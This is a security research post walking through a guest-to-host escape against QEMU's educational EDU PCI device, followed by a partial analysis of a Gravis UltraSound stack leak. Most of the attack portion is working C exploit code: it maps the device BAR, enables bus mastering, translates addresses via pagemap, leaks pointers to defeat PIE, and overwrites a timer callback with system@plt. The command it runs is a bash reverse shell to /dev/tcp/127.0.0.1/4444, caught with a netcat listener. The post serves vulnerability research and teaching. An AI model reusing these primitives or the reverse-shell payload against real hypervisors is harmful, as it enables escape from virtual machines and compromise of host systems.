2026-05-22 - research
Escaping QEMU
A reproducible guest-to-host escape against QEMU's educational PCI device. The bug is a DMA bounds check that logs out-of-range transfers but keeps going, giving both an out-of-bounds read and write against the timer callback stored next to the device's DMA buffer.
Why QEMU as a target for vulnerability research?
QEMU is the engine sitting underneath an enormous chunk of the world's virtualization. A large share of cloud and hosting providers (DigitalOcean and OCI among them) run guest VMs on KVM, and the userspace device model bolted to KVM is very often QEMU - or something that mirrors its device-emulation contract closely enough that the guest can't tell the difference (Firecracker, Cloud Hypervisor, and crosvm are independent Rust codebases, but they all implement the same virtio device interfaces, such as virtio-net and virtio-blk, that guests see). The picture is not uniform: GCP pairs KVM with its own device model, Azure runs on Hyper-V, and AWS ran Xen before Nitro. Still, if you are renting a Linux VM, there is a good chance that a QEMU process, or a device model shaped like one, is the thing emulating your "hardware".
The second reason is surface area. QEMU is roughly two million lines of C, most of it in hw emulating decades of real and obscure hardware - PCI devices, audio cards, SCSI controllers, NVMe, USB, network cards, GPUs, even a Gravis UltraSound from 1992. Most of that code parses attacker-controlled register writes, DMA descriptors, and packet formats with the same trust level as a kernel driver.
Third, the bug history is rich and well-precedented. VENOM (CVE-2015-3456) in the floppy controller, the long string of virtio-net / e1000 / xhci CVEs, repeated NVMe and USB issues, and more: QEMU has a long public history of guest-reachable memory corruption that turns into host code execution.
The source is open, the build is straightforward, the guest can be a tiny userspace process that talks directly to the device under audit, and the feedback loop between "write a few MMIO/PIO/DMA operations" and "watch the host process crash" is incredibly tight. For research aimed at a public writeup and a video PoC, that combination, plus the real-world impact, is hard to beat.
Methodology for bug hunting
For small to medium codebases it's normal to statically audit the entire source. We did not do a full sweep of QEMU; in other words, we did not look at every single line of code. QEMU is BIG, two-million-plus-lines-of-code big (and that's just the C code), so we examined a few subsections in a few directories instead. The primary focus was hw/, the emulated-device tree, where the guest-reachable attack surface lives.
That audit produced a pile of candidate bugs across a couple of dozen devices - ATI, NVMe, USB MTP, GUS, EDU, others - most of which collapsed under scrutiny (DoS-only, unreachable from a default config, killed by a qemu_ram_mmap guard page, etc.). The one we landed on for the writeup is a clean classical OOB in hw/misc/edu.c. It's interesting for an unusual reason: the same primitive that gives you an OOB write also gives you an OOB read, so you don't need a second bug for a leak. Single bug, full chain.
A quick aside on the target file
Before we go any further, it's worth explaining what hw/misc/edu.c is. EDU is QEMU's educational PCI device - a deliberately small, deliberately simple PCI device documented in docs/specs/edu.rst as an example for people learning the QEMU device model. You compile it in via CONFIG_TEST_DEVICES and attach it with -device edu. It is not part of any default production QEMU build. Debian's qemu-system-x86_64, Ubuntu's, RHEL's, the QEMU shipped by every cloud provider I checked - all built with the test devices stripped out.
So this writeup is not about a CVE, not a 0day, and upstream QEMU is not going to patch it (and shouldn't - the file is a tutorial). What it is is a self-contained, reproducible, single-bug guest-to-host escape, demonstrated end-to-end, against the exact device QEMU hands new contributors to teach them how device emulation is supposed to work.
There's also a second bug we played with along the way - an off-by-2x in the emulated Gravis UltraSound's 16-bit DMA path that leaks 2 KiB of host stack. That one is in a real device (well, real-ish - it's a 1992 ISA sound card), and the write-up below has a section on it. It didn't end up in the final chain because we realized EDU's bug was bidirectional; but the audit-and-walk-away process is part of the story.
The bug
The vulnerability is in edu_dma_timer(), and the one-line description is:
edu_check_range() logs the failure but doesn't abort the transfer; both the FROM_PCI and TO_PCI branches call it and both ignore the (non-existent) error signal, so a single OOB primitive points in both directions.
That's the whole thing. The leak path reads 16 bytes from before dma_buf and gives us QEMUTimer.cb (a .text pointer, defeats PIE) and QEMUTimer.opaque (the heap address of the EduState itself). The write path puts arbitrary bytes at that same location. Trigger the timer, QEMU's main loop calls cb(opaque), control's ours.
A brief primer on what we're talking to
If you've only done CTF pwn, "guest userspace exploits a PCI device emulated by the hypervisor" is a couple of layers more indirection than you're used to, so it's worth sketching the moving parts in one place before we get into the bug.
MMIO. A PCI device exposes some number of "BARs" (Base Address Registers). Each BAR is assigned a range of physical addresses; for our purposes, that range lives in the guest's physical address space. Stores to addresses inside that range don't go to RAM, they get routed to the device and the device's MMIO handler runs. From software, "write a 32-bit register on the device" is just *(volatile uint32_t*)addr = value;. The kernel side of this on Linux is exposed through sysfs: /sys/bus/pci/devices/<BDF>/resource0 is a file whose mmap is the device's BAR0. Open it, mmap it, and now *ptr writes to the device.
DMA. DMA stands for Direct Memory Access. The relevant property for us is that DMA is initiated by the device, not by the CPU. The CPU programs a few of the device's registers (source physical address, destination physical address, byte count, "go" bit), and then the device, completely independently of the CPU, reaches into system memory and reads or writes the range. The CPU has moved on by then. On real hardware this is how disks talk to RAM without making the CPU babysit each byte; on QEMU, the emulated device does the same thing through pci_dma_read / pci_dma_write helpers that copy in or out of the guest's memory image.
The crucial implication for exploitation is that DMA addresses are guest physical, not guest virtual. Our exploit lives in userspace and gets handed virtual addresses; we have to translate them to physical before we can hand them to the device.
Bus mastering. A PCI device only gets to initiate DMA if the "bus master" bit in its config space is set (PCI COMMAND register, offset 0x04, bit 2). Kernel drivers flip this in their probe() via pci_set_master(). A userspace process that just mmaps resource0 doesn't trigger that path, so bus master stays off, and every DMA the device tries to do gets silently nuked at the PCI bridge. This bit us hard; we'll come back to it.
Pagemap. To get virt->phys from userspace, Linux exposes /proc/self/pagemap. Each 4 KiB page of your virtual address space has an 8-byte entry: bit 63 is "page is present", bits 0–54 are the page frame number (PFN, i.e. which physical page it's mapped to). Read the entry for the page your buffer lives on, multiply the PFN by the page size, add the in-page offset, and you have the guest-physical address.
PIE / ASLR. Modern binaries (QEMU included) are compiled as Position-Independent Executables, and the loader picks a random base address at process start. To compute the address of anything in the binary - a function, a PLT entry, a .rodata string - we need to leak something whose load offset within the binary is known, then subtract.
That's basically the set of OS-internals we have to thread together. Now back to the bug.
The struct layout
The EduState definition:
#define DMA_START 0x40000
#define DMA_SIZE  4096

struct EduState {
    PCIDevice pdev;
    MemoryRegion mmio;
    ...
    struct dma_state {
        dma_addr_t src;
        dma_addr_t dst;
        dma_addr_t cnt;
        dma_addr_t cmd;
    } dma;
    QEMUTimer dma_timer;    // <-- holds the callback pointer and its opaque argument
    char dma_buf[DMA_SIZE]; // <-- our OOB target buffer sits AFTER the timer
    uint64_t dma_mask;
};
Two things matter. First, dma_buf is an in-struct field on the host heap (not its own allocation), so writes past it (or before it) corrupt sibling fields in the same EduState. Second, QEMUTimer dma_timer sits immediately before dma_buf, and a QEMUTimer contains a callback function pointer plus an opaque argument. Underflowing the dma_buf write lands exactly on top of those two fields.
The QEMUTimer definition:
struct QEMUTimer {
    int64_t expire_time;        /* in nanoseconds */
    QEMUTimerList *timer_list;
    QEMUTimerCB *cb;            // <-- function pointer fired on expiry
    void *opaque;               // <-- first argument passed to cb()
    QEMUTimer *next;
    int attributes;
    int scale;
};
When the timer expires, QEMU's main loop literally does t->cb(t->opaque). Control both, and the next fire is "whatever function we want, with whatever argument we want".
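To make the "control both fields" point concrete, here is a minimal sketch of that dispatch in isolation. The names mini_timer, mini_timer_fire, add_one and add_ten are hypothetical stand-ins invented for illustration; this is not QEMU's timer code, only the shape of the cb(opaque) call with two harmless callbacks.

```c
#include <stddef.h>

typedef void (*timer_cb)(void *opaque);

/* Reduced, hypothetical stand-in for QEMUTimer: only the two fields
 * that the expiry dispatch actually uses. */
struct mini_timer {
    timer_cb cb;
    void *opaque;
};

/* What expiry boils down to: call cb with opaque as its only argument. */
static void mini_timer_fire(const struct mini_timer *t)
{
    if (t->cb != NULL) {
        t->cb(t->opaque);
    }
}

/* Two harmless callbacks; each adds a distinct amount to an int counter. */
static void add_one(void *opaque) { *(int *)opaque += 1; }
static void add_ten(void *opaque) { *(int *)opaque += 10; }
```

Firing a timer set up as { add_one, &counter } bumps the counter by 1; after only the cb field is changed to add_ten, the same fire call adds 10. Nothing in the dispatch path checks what cb points at, which is why the two fields next to dma_buf matter so much.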
The check that doesn't check
The bounds check that doesn't stop anything:
static void edu_check_range(uint64_t xfer_start, uint64_t xfer_size,
                            uint64_t dma_start, uint64_t dma_size)
{
    uint64_t xfer_end = xfer_start + xfer_size;
    uint64_t dma_end = dma_start + dma_size;

    if (dma_end >= dma_start && xfer_end >= xfer_start &&
        xfer_start >= dma_start && xfer_end <= dma_end) {
        return;
    }

    qemu_log_mask(LOG_GUEST_ERROR,
                  "EDU: DMA range 0x%016"PRIx64"-0x%016"PRIx64
                  " out of bounds (0x%016"PRIx64"-0x%016"PRIx64")!",
                  xfer_start, xfer_end - 1, dma_start, dma_end - 1);
}
This is the entire validator. What's missing here is a return-with-error, an abort(), anything that stops the transfer. On a failed bounds check the function just complains through qemu_log_mask() and falls off the end back into the caller, which keeps going as if nothing happened. The check is purely advisory.
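For contrast, a minimal sketch of the same comparison written so that the caller can act on the result. The name edu_range_ok is hypothetical and this is not an upstream patch; it only reuses the four conditions from the function above and returns them as a verdict.

```c
#include <stdbool.h>
#include <stdint.h>

/* Hypothetical variant of edu_check_range(): same four conditions,
 * but the verdict is returned instead of only being logged. */
static bool edu_range_ok(uint64_t xfer_start, uint64_t xfer_size,
                         uint64_t dma_start, uint64_t dma_size)
{
    uint64_t xfer_end = xfer_start + xfer_size;
    uint64_t dma_end = dma_start + dma_size;

    return dma_end >= dma_start &&   /* window itself did not wrap   */
           xfer_end >= xfer_start && /* transfer did not wrap        */
           xfer_start >= dma_start && /* starts inside the window    */
           xfer_end <= dma_end;      /* ends inside the window       */
}
```

A caller would then skip the transfer whenever this returns false. With DMA_START = 0x40000 and DMA_SIZE = 4096, a 16-byte transfer at 0x3FFE0 is rejected, as is one that starts in range but runs past the end of the window.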
Same bug, both directions
edu_dma_timer, the function this all happens inside:
static void edu_dma_timer(void *opaque)
{
    EduState *edu = opaque;
    ...
    if (EDU_DMA_DIR(edu->dma.cmd) == EDU_DMA_FROM_PCI) {
        uint64_t dst = edu->dma.dst;
        edu_check_range(dst, edu->dma.cnt, DMA_START, DMA_SIZE); // advisory only
        dst -= DMA_START;                                        // <-- underflow
        pci_dma_read(&edu->pdev, edu_clamp_addr(edu, edu->dma.src),
                     edu->dma_buf + dst, edu->dma.cnt);
    } else {
        uint64_t src = edu->dma.src;
        edu_check_range(src, edu->dma.cnt, DMA_START, DMA_SIZE); // advisory only
        src -= DMA_START;                                        // <-- underflow
        pci_dma_write(&edu->pdev, edu_clamp_addr(edu, edu->dma.dst),
                      edu->dma_buf + src, edu->dma.cnt);
    }
Same advisory check, same subtract-and-don't-handle-underflow, just pci_dma_read on the FROM_PCI branch (write into dma_buf) and pci_dma_write on the TO_PCI branch (read out of dma_buf). The flow is:
- Guest picks dst = 0x3FFE0 (= DMA_START - 0x20). Any value < 0x40000 is enough.
- edu_check_range() logs an error, returns.
- dst -= DMA_START underflows: 0x3FFE0 - 0x40000 as uint64_t is 0xFFFFFFFFFFFFFFE0.
- dma_buf + dst in pointer arithmetic wraps mod 2^64 and lands 0x20 bytes before dma_buf, which is exactly on dma_timer.cb / dma_timer.opaque.
- pci_dma_read writes 16 attacker-controlled bytes there; pci_dma_write reads 16 bytes out of there back to the guest.
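The arithmetic in that list can be checked on its own. The sketch below assumes a 64-bit host with 8-byte pointers and no unexpected padding; mock_timer and mock_edu_tail are hypothetical mirrors of the QEMUTimer and EduState fields quoted earlier, not the real QEMU types.

```c
#include <stddef.h>
#include <stdint.h>

#define DMA_START 0x40000ULL

/* Hypothetical mirror of the QEMUTimer fields quoted above. */
struct mock_timer {
    int64_t expire_time;
    void *timer_list;
    void (*cb)(void *);
    void *opaque;
    void *next;
    int attributes;
    int scale;
};

/* Hypothetical mirror of the tail of EduState: timer, then buffer. */
struct mock_edu_tail {
    struct mock_timer dma_timer;
    char dma_buf[4096];
};

/* The unsigned subtraction edu_dma_timer() performs on a guest address. */
uint64_t wrapped_index(uint64_t guest_addr)
{
    return guest_addr - DMA_START;
}

/* The same value reinterpreted as a signed distance from dma_buf[0]. */
int64_t signed_offset(uint64_t guest_addr)
{
    return (int64_t)(guest_addr - DMA_START);
}

/* Distance from dma_buf[0] back to the timer's cb field in the mock. */
ptrdiff_t cb_offset_from_dma_buf(void)
{
    return (ptrdiff_t)offsetof(struct mock_edu_tail, dma_timer.cb) -
           (ptrdiff_t)offsetof(struct mock_edu_tail, dma_buf);
}
```

Under those assumptions the mock timer is 0x30 bytes with cb at offset 0x10, so cb sits 0x20 bytes before dma_buf and opaque 0x18 bytes before it. That matches the index that 0x3FFE0 wraps to.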
So one bug, applied two ways, gives us:
- OOB read (TO_PCI, src = DMA_START - 0x20): leaks cb (a known .text symbol -> PIE base) and opaque (the heap address of the EduState struct itself).
- OOB write (FROM_PCI, dst = DMA_START - 0x20): overwrites cb and opaque with arbitrary 8-byte values.
Then we just need to fire the timer.
dma_rw, the helper that handles every register write:
static void dma_rw(EduState *edu, bool write, dma_addr_t *val, dma_addr_t *dma,
                   bool timer)
{
    if (write && (edu->dma.cmd & EDU_DMA_RUN)) {
        return;
    }

    if (write) {
        *dma = *val;
    } else {
        *val = *dma;
    }

    if (timer) {
        timer_mod(&edu->dma_timer, qemu_clock_get_ms(QEMU_CLOCK_VIRTUAL) + 100);
    }
}
Any DMA kick goes through timer_mod(&edu->dma_timer, ...). After the OOB write has overwritten dma_timer.cb, the very next DMA kick schedules a timer whose callback is system() and whose argument we control. About 100 ms later the QEMU main loop fires the timer on the host: cb(opaque) is now system("bash -c '...'"), executed inside the QEMU process. That's the whole chain.
The picture
GUEST HOST (QEMU process)
----- --------------------
STEP 1 - LEAK (TO_PCI, src = DMA_START - 0x20)
write SRC = 0x3FFE0 ┌──────────────────────────────────────┐
write DST = guest_phys │ edu_dma_timer() / TO_PCI branch │
write CNT = 16 │ edu_check_range() ── logs, returns │
write CMD = RUN | TO_PCI ─────────▶│ src -= DMA_START ── underflow │
│ pci_dma_write(... dma_buf+src,...) │
│ == pci_dma_write(... cb, 16) │
└──────────────┬───────────────────────┘
│ 16 bytes from before
▼ dma_buf into guest RAM
┌──────────────────────────────────────┐
│ QEMUTimer.cb (& edu_dma_timer) │
│ QEMUTimer.opaque (& EduState) │
└──────────────────────────────────────┘
read leak[0] = cb -> PIE base
read leak[1] = opaque -> heap base of EduState
STEP 2 - OVERWRITE (FROM_PCI, dst = DMA_START - 0x20)
write payload to guest buf:
[0] = pie_base + SYSTEM_PLT_OFF (system@plt)
[1] = opaque + DMABUF_OFF (&dma_buf in host heap)
... and plant "bash -c '...'" into dma_buf via an in-bounds FROM_PCI ...
write SRC = payload_phys ┌──────────────────────────────────────┐
write DST = 0x3FFE0 │ edu_dma_timer() / FROM_PCI branch │
write CNT = 16 │ edu_check_range() ── logs, returns │
write CMD = RUN | FROM_PCI ───────▶│ dst -= DMA_START ── underflow │
│ pci_dma_read(... dma_buf+dst,...) │
│ == pci_dma_read(... cb, 16) │
└──────────────┬───────────────────────┘
│ cb,opaque now ours
▼
STEP 3 - TRIGGER
write CMD = RUN | FROM_PCI ───────▶ dma_rw(timer=true)
timer_mod(&dma_timer, now+100ms)
│
▼ 100ms later
dma_timer.cb(opaque)
== system("bash -c '...'")
│
▼
reverse shell on the host
Three EDU MMIO sequences. That's it.
Exploit development
The two halves of the primitive are easy to describe and unforgiving to wire up. This section walks through the dev loop from "boot an Ubuntu guest" to "host QEMU process opens a reverse shell to our listener", including the time-burners we hit.
The dev loop
The exploit runs from guest userspace, not from a bare-metal kernel. We boot a stock Ubuntu 24.04 cloud image inside QEMU with the vulnerable -device edu attached, cloud-init drops in an SSH key, and a Makefile shuttles poc.c over SSH, compiles it on the guest, and we run it as root:
make run # boot Ubuntu, EDU attached, SSH forwarded to host:2222
make exploit # scp poc.c, gcc on the guest, leave ~/pwn ready
make run-exploit # sudo ./pwn over SSH, streamed to your terminal
make gdb # in another terminal: attach gdb to the QEMU host process,
# auto-break on edu_dma_timer and edu_mmio_write
Two terminals, one tight loop. Every iteration is "edit poc.c on the host, make run-exploit, watch edu_dma_timer fire in host gdb". When the chain works, gdb stops with the chosen sentinel in RIP (during the smoke-test) or with RIP = system@plt and RDI pointing at our planted "bash -c '...'" command string (for the real payload).
Talking to the device
The PoC is a regular Linux userspace program - no kernel module, no UIO driver. As mentioned above, Linux exposes every PCI device's BAR through sysfs, and you mmap that to get a pointer at the device's MMIO window:
static volatile void *map_bar0(const char *bdf, size_t size)
{
    char path[512];
    snprintf(path, sizeof path, "/sys/bus/pci/devices/%s/resource0", bdf);

    int fd = open(path, O_RDWR | O_SYNC);
    if (fd < 0) die_e("open resource0 (needs root)");

    void *bar = mmap(NULL, size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
    if (bar == MAP_FAILED) die_e("mmap BAR0");

    close(fd);  /* the mapping stays valid after the fd is closed */
    return bar;
}
Now mmio_w32(bar, EDU_REG_DMA_SRC, ...) is a direct store to device-mapped memory, and EDU's edu_mmio_write handler runs on the host as a side effect. We sanity-check with the factorial register (5! == 120) and a 64-byte DMA round-trip (guest RAM -> dma_buf -> guest RAM) before touching the bug:
static void sanity_dma_roundtrip(volatile void *bar)
{
    struct dma_buf src = dma_alloc_low();
    struct dma_buf dst = dma_alloc_low();
    const char *msg = "edu dma roundtrip works";

    strcpy(src.virt, msg);
    edu_dma_run(bar, src.phys, EDU_DMA_START, 64, EDU_DMA_FROM_PCI); /* guest RAM -> dma_buf */
    edu_dma_run(bar, dst.phys, EDU_DMA_START, 64, EDU_DMA_TO_PCI);   /* dma_buf -> guest RAM */

    if (memcmp(src.virt, dst.virt, strlen(msg)) != 0)
        die("DMA roundtrip mismatch - virt->phys probably wrong");
    printf("[+] DMA roundtrip: \"%s\"\n", (char *)dst.virt);
}
If this prints the round-tripped string, your virt->phys conversion is right, your bus-master bit is on, and your dma_mask clamp didn't silently rewrite the address. If it doesn't, none of the later stages will work either, and you want to figure out which of those three things is broken now, not three primitives deep.
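The mmio_w32 helper named above is not shown in this post. A plausible definition, given here purely as an assumption about its shape (the one in poc.c may differ, and mmio_r32 is a hypothetical companion), is a volatile 32-bit access at a byte offset from the mapped BAR:

```c
#include <stddef.h>
#include <stdint.h>

/* Assumed shape of the helper: one volatile 32-bit store at bar + off. */
static inline void mmio_w32(volatile void *bar, size_t off, uint32_t val)
{
    *(volatile uint32_t *)((volatile uint8_t *)bar + off) = val;
}

/* Hypothetical read-side companion: one volatile 32-bit load. */
static inline uint32_t mmio_r32(volatile void *bar, size_t off)
{
    return *(volatile uint32_t *)((volatile uint8_t *)bar + off);
}
```

The volatile qualifier is the point of the wrapper: it keeps the compiler from merging, reordering, or dropping accesses that look redundant for ordinary memory but are meaningful for a device register. Pointed at a plain uint32_t array instead of a BAR, the helpers behave like ordinary loads and stores, which makes them easy to test off-device.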
The bus-master gotcha — must be enabled in the guest
The first real time-burner. With the round-trip in place, the FROM_PCI half of the DMA appeared to fire - edu_dma_timer ran, the RUN bit cleared, no error printed - but the destination buffer was still all zeros. Stepping host edu_dma_timer in gdb showed pci_dma_read(&edu->pdev, src.phys, dma_buf, 64) returning without populating dma_buf. The device received the right address, called into the PCI DMA helper, and got nothing back.
The reason: a PCI device can only initiate DMA when bus mastering is enabled in its PCI command register. Linux kernel drivers turn this on with pci_set_master() during probe(). A user-space process talking to the device via mmap of resource0 does not trigger that path - you get MMIO, but bus master stays off, and every DMA the device tries to issue is silently dropped.
The fix is one config-space write in the guest, done once at startup:
static void pci_enable_bus_master(const char *bdf)
{
    char path[512];
    snprintf(path, sizeof path, "/sys/bus/pci/devices/%s/config", bdf);

    int fd = open(path, O_RDWR);
    if (fd < 0) die_e("open config");

    uint16_t cmd = 0;
    /* PCI COMMAND register lives at config-space offset 0x04 */
    if (pread(fd, &cmd, sizeof cmd, 0x04) != sizeof cmd) die_e("pread COMMAND");
    if (!(cmd & 0x4)) {
        cmd |= 0x4;  /* bit 2 = bus master enable */
        if (pwrite(fd, &cmd, sizeof cmd, 0x04) != sizeof cmd) die_e("pwrite COMMAND");
    }
    close(fd);
}
After this, pci_dma_read actually returns guest memory and the round-trip passes. Worth calling out because the failure mode is silent. The MMIO writes succeed, the device's dma.src / dst / cnt registers retain the values we put there, the timer fires on the host, and the read just produces zeros. No errno, no dmesg, no QEMU log line - only a dma_buf that never fills. We spent an embarrassing amount of time chasing the wrong leads (virt->phys correctness, page-migration / zero-page CoW, the EDU 28-bit dma_mask) before host gdb made it obvious. If you're targeting an emulated PCI device from guest userspace, enable bus master first, then trust your primitives.
virt -> phys, and the 28-bit DMA mask
DMA addresses go in guest physical form, but our mmap'd buffer is a guest virtual address. The standard trick - /proc/self/pagemap - works fine from a root process:
static uint64_t virt_to_phys(const void *vaddr)
{
    static int pm_fd = -1;
    if (pm_fd < 0) {
        pm_fd = open("/proc/self/pagemap", O_RDONLY);
        if (pm_fd < 0) die_e("open /proc/self/pagemap (needs root)");
    }

    uint64_t v = (uint64_t)vaddr;
    uint64_t ps = sysconf(_SC_PAGESIZE);
    uint64_t entry;
    /* one 8-byte entry per virtual page, indexed by virtual page number */
    if (pread(pm_fd, &entry, sizeof entry, (v / ps) * sizeof entry) != sizeof entry)
        die_e("pread pagemap");
    if (!(entry & (1ULL << 63))) die("page %p not present", vaddr);

    uint64_t pfn = entry & ((1ULL << 55) - 1);  /* bits 0-54 */
    if (pfn == 0) die("PFN zero for %p (need CAP_SYS_ADMIN)", vaddr);
    return pfn * ps + (v % ps);
}
The page has to be present (touched) and ideally mlock'd before this read, otherwise the kernel may not have backed it yet, or may decide to swap or migrate it after you grab the PFN and leave you holding a stale physical address.
There's also one device-specific subtlety. The EDU device hard-codes its DMA address mask to 28 bits ((1UL << 28) - 1) at instance init, and edu_dma_timer passes every guest address through edu_clamp_addr(edu, addr), which amounts to addr & dma_mask, before handing it to pci_dma_read or pci_dma_write. So any buffer whose physical address sits at or above 256 MiB silently gets aliased to a different page. With a 2 GiB guest, only ~1 in 8 freshly-allocated pages land in the low 256 MiB. We solved this with a brute-force "allocate, check, keep" loop:
static struct dma_buf dma_alloc_low(void)
{
    for (int i = 0; i < LOW_PHYS_TRIES; i++) {
        struct dma_buf b = dma_alloc(sysconf(_SC_PAGESIZE));
        if (b.phys < EDU_LOW_PHYS_LIMIT) return b;
        /* keep mlock'd to prevent PFN reuse; do not munmap */
    }
    die("no page below 256 MiB after %d tries", LOW_PHYS_TRIES);
    struct dma_buf z = {0}; return z;  /* not reached */
}
Mlocking the rejects (rather than munmap'ing them) is load-bearing. If you free them, the kernel happily recycles the same high PFNs back to you and the loop never terminates.
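The aliasing behind that 256 MiB limit is easy to see in isolation. A small sketch of the 28-bit mask arithmetic described above follows; clamp28 and survives_clamp are hypothetical names, and this models only the mask, not the device's actual edu_clamp_addr().

```c
#include <stdbool.h>
#include <stdint.h>

#define EDU_DMA_MASK ((1ULL << 28) - 1)  /* the 28-bit mask described above */

/* What a 28-bit clamp does to a guest-physical address. */
static uint64_t clamp28(uint64_t phys)
{
    return phys & EDU_DMA_MASK;
}

/* True when the address reaches the device unchanged. */
static bool survives_clamp(uint64_t phys)
{
    return clamp28(phys) == phys;
}
```

A page at 0x0FFFF000 passes through untouched, while one at 0x10001000 is silently turned into 0x00001000, a completely different guest page. That is why the allocator above rejects anything at or beyond the 256 MiB mark.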
Pulling the leak
With the round-trip working and buffers in the low 256 MiB, the read-side OOB is one DMA away. TO_PCI direction, src = DMA_START - 0x20, count 16, host writes 16 bytes from dma_buf - 0x20 (= &dma_timer.cb) into our guest page:
struct dma_buf leak = dma_alloc_low();
memset(leak.virt, 0xa5, leak.size);
edu_dma_run(bar, leak.phys, EDU_DMA_START - 0x20, 0x10, EDU_DMA_TO_PCI);
uint64_t cb_leak = ((uint64_t *)leak.virt)[0];
uint64_t opaque_leak = ((uint64_t *)leak.virt)[1];
if (cb_leak == 0 || (cb_leak >> 47) != 0)
die("leak failed: cb=0x%lx opaque=0x%lx — bug not triggered?",
cb_leak, opaque_leak);
uint64_t pie_base = cb_leak - EDU_DMA_TIMER_OFF;
uint64_t system_addr = pie_base + SYSTEM_PLT_OFF;
uint64_t cmd_host_addr = opaque_leak + EDUSTATE_DMABUF_OFF;
cb_leak is &edu_dma_timer, the QEMU .text symbol the timer fires by default. Subtract its static offset within the binary and you have the PIE base; add the static offset of system@plt and you have the resolved address of system() in the QEMU process. opaque_leak is the EduState* itself (the timer's opaque is the EduState so the callback can find its own state), so opaque_leak + offsetof(EduState, dma_buf) is the host VA of dma_buf[0].
The build-specific numbers (EDU_DMA_TIMER_OFF, SYSTEM_PLT_OFF, EDUSTATE_DMABUF_OFF) come from nm, objdump, and a one-liner gdb on the QEMU binary - they're a few #defines at the top of poc.c.
Planting system's argument
Now we have to point system() at something useful. opaque becomes RDI when the timer fires, which is system()'s first argument - a const char * to the shell command we want to run. We can't write that string just anywhere; we need an address inside the QEMU host process that we control.
Two options were on the table. We could scan QEMU's .rodata for a useful command string - but the only thing remotely interesting is "/bin/sh" as a substring of #!/bin/sh lines, and system("/bin/sh") is useless to us because the spawned shell ends up fighting QEMU's monitor over stdio (we found this out the hard way during the smoke-test). Or, we could write our own string somewhere we know the host address of - and we already know the host address of dma_buf, because we just leaked the EduState* and offsetof(EduState, dma_buf) is a constant we get from gdb.
So before the OOB write, we plant the command string into dma_buf using a legit, in-bounds FROM_PCI DMA. This is just a normal write at dst = DMA_START, no underflow, no log spam:
#define RSHELL_CMD \
"bash -c 'bash -i >& /dev/tcp/127.0.0.1/4444 0>&1'"
struct dma_buf cmd = dma_alloc_low();
memset(cmd.virt, 0, cmd.size);
strcpy(cmd.virt, RSHELL_CMD);
edu_dma_run(bar, cmd.phys, EDU_DMA_START, strlen(RSHELL_CMD) + 1, EDU_DMA_FROM_PCI);
offsetof(EduState, dma_buf) = 0xcc0 on the build I tested against; gdb prints it cleanly:
$ gdb -batch -ex 'p &((struct EduState *)0)->dma_buf' qemu-system-x86_64
$1 = (char (*)[4096]) 0xcc0
After this DMA returns, the string lives at host VA opaque_leak + 0xcc0.
From leak to RIP control
Now the actual exploit. OOB write with dst = DMA_START - 0x20, count 16, source a guest page containing { system@plt, &dma_buf }:
struct dma_buf payload = dma_alloc_low();
uint64_t *p = (uint64_t *)payload.virt;
p[0] = system_addr; /* -> dma_timer.cb */
p[1] = cmd_host_addr; /* -> dma_timer.opaque (= RDI = our cmd string) */
edu_dma_run(bar, payload.phys, EDU_DMA_START - 0x20, 16, EDU_DMA_FROM_PCI);
pci_dma_read runs on the host, the underflow lands the 16 bytes on dma_timer.cb / dma_timer.opaque, and the timer is now armed to call system(our_string) on its next fire.
Re-arming the timer
There's one more subtlety. The OOB write happens inside edu_dma_timer itself, that is, inside the very callback the timer fired to perform the transfer. By the time pci_dma_read returns inside edu_dma_timer, the in-memory dma_timer.cb has been replaced with our value, but dma_timer itself has already been popped off the active-timers list - it won't fire again on its own. We need any subsequent CMD-write to call timer_mod() again, which re-inserts the now-corrupted timer:
if (timer) {
timer_mod(&edu->dma_timer, qemu_clock_get_ms(QEMU_CLOCK_VIRTUAL) + 100);
}
So the exploit issues a small kick after the overwrite, just a CMD write with RUN=1 and a direction bit. We use a "fire and forget" wrapper that doesn't poll for RUN-clear - because the moment the corrupted callback runs, control transfers to system(), which is not going to be clearing RUN for us:
static void edu_dma_trigger_nowait(volatile void *bar, uint32_t direction)
{
mmio_w64(bar, EDU_REG_DMA_CMD, EDU_DMA_RUN | direction);
}
100 ms later, on the host, QEMU's main loop fires system("bash -c 'bash -i >& /dev/tcp/127.0.0.1/4444 0>&1'"). A netcat listener (nc -lvnp 4444) waiting in another terminal gets an interactive bash session running as the user QEMU was running as. From there it's a regular host - you can read /proc/self/exe, look at the parent process tree, do whatever a process with the QEMU UID is allowed to do, and the VM you started in is still happily running below you.
From inside an ordinary Ubuntu guest (root inside the VM, no privileges on the host), with no kernel module, just MMIO and PCI DMA against -device edu, the QEMU process is now running bash for us. Everything above this in the host's process tree - libvirt, the cloud control plane, whatever else trusted QEMU to stay in its lane - now answers to us.
The path not taken — GUS
Our first leak primitive lived in a totally different device. The 16-bit DMA path in QEMU's emulated Gravis UltraSound has a real-honest-to-god off-by-2× bug that reads twice as many bytes from a 4 KiB host stack buffer as it actually contains, and dumps those bytes into guest-readable wavetable RAM.
static int GUS_read_DMA(void *opaque, int nchan, int dma_pos, int dma_len)
{
    QEMU_UNINITIALIZED char tmpbuf[4096];   // stack buffer, NOT zeroed
    ...
    copied = k->read_memory(s->isa_dma, nchan, tmpbuf, pos, to_copy);
    gus_dma_transferdata(&s->emu, tmpbuf, copied, left == copied);
    ...
}
tmpbuf is 4 KiB on the host stack, deliberately uninitialized. ISA DMA fills copied bytes from guest RAM. Then gus_dma_transferdata() does this:
for (; count > 0; count--)
{
    if (GUSregb(GUS41DMACtrl) & 0x40)
        *(destaddr++) = *(srcaddr++);                 // lobyte
    else
        *(destaddr++) = (msbmask ^ (*(srcaddr++)));   // 8-bit
    if (state->gusdma >= 4)                           // <-- 16-bit DMA channel
        *(destaddr++) = (msbmask ^ (*(srcaddr++)));   // hibyte
}
count decrements by 1 per iteration, but when state->gusdma >= 4 (a 16-bit DMA channel, guest-selectable) the loop consumes two bytes of srcaddr per iteration. So it reads 2 * count bytes from a buffer that only has count valid bytes: the next 4 KiB past tmpbuf on the host stack gets sucked in and written into wavetable RAM. The guest reads it back one byte at a time through port 0x307 (DRAMaccess).
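The 2x factor falls straight out of the loop shape. Below is a minimal model that tracks only how far srcaddr advances; gus_src_bytes_read is a hypothetical name, and the model ignores the register check and the data itself.

```c
#include <stddef.h>

/* Model of the loop above: returns how many source bytes it consumes
 * for a given count and DMA channel number. */
static size_t gus_src_bytes_read(size_t count, int dma_channel)
{
    size_t read = 0;

    for (; count > 0; count--) {
        read++;                 /* low byte, or the only byte on 8-bit channels */
        if (dma_channel >= 4) {
            read++;             /* high byte on 16-bit channels */
        }
    }
    return read;
}
```

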